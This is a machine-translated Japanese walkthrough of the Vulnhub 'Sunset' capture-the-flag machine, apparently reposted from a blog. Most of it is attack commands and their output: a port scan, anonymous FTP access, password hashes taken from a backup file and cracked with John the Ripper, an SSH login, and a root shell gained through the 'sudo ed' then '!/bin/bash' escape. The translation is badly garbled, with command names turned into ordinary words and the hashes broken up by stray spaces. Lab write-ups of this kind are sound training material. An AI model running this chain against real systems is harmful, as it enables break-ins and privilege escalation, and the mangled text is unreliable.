サンセット:Vulnhubチュートリアル

スキャンホスト:

╰─nmapの-p1-65535 -sV N 10.10.202.147

PORT STATE SERVICE VERSION
21 / tcpのオープンのftp pyftpdlib 1.5.5
| FTP-アノン:匿名FTPのログイン許可(FTPコード230)
| _-R RW - r--の1ルートルート1062年7月29日午後12時のバックアップ
| FTP-SYST:
| STAT:
| FTPサーバーのステータス:
| 接続:10.10.202.147:21
| ユーザ名を待っています。
| TYPE:ASCII。構造:ファイル; MODE:ストリーム
| データ接続が閉じました。
|状態の_END。
22 TCP /オープンのSSHのOpenSSH 7.9p1のDebian 10(プロトコル2.0)
| SSH-ホスト鍵:
| 2048 71:BD:FA:C5:8C:88:7C:22:14:C4:20:03:32:36:05:D6(RSA)
| 256 35:92:8E:16:43:0C:39:88:8E:83:0D:E2:C:A4:65:91(ECDSA)
| _ 256 45:C5:40:14:49:CF: 80:3C:41:4F:BB:22:6C:80:1E:FE(ED25519)

 

匿名FTPアクセス

ユーザー名:匿名

パスワード:空 

╰─猫バックアップ
CREDENTIALS:
オフィス:9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr / avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X $$ $ 6
データセンター:$ 6 $$ 3QW / J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ / 6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN /
空:$ 6 $$ Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
日没:$ 6 $ 406THujdibTNu / R $ NzquK0QRsbAUUSrHcpR2QrrlU3fA / SJo7sPDPbP3xcCR / lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo /
スペース:$ 6 $$ 4NccGQWPfiyfGKHgyhJBgiadOlP / FM4.Qwl1yIWP28ABx .YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx /

 

ジョンはブルートフォースを使用します

1.TXT、テキストの新しいハッシュにそれをコピーします

╰─ジョン1.TXT 

成功したパスワードを爆破見ます

╰─ジョン--show 1.TXT

空:空の
夕日:cheer14
スペース:スペース

試行後:サンセット:cheer14は、ログインすることができます

 

右に言及してみてください。

sudo /usr/bin/ed
!/bin/bash
root@sunset:/home/sunset#
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)

完! 

おすすめ

転載: www.cnblogs.com/hack404/p/11298094.html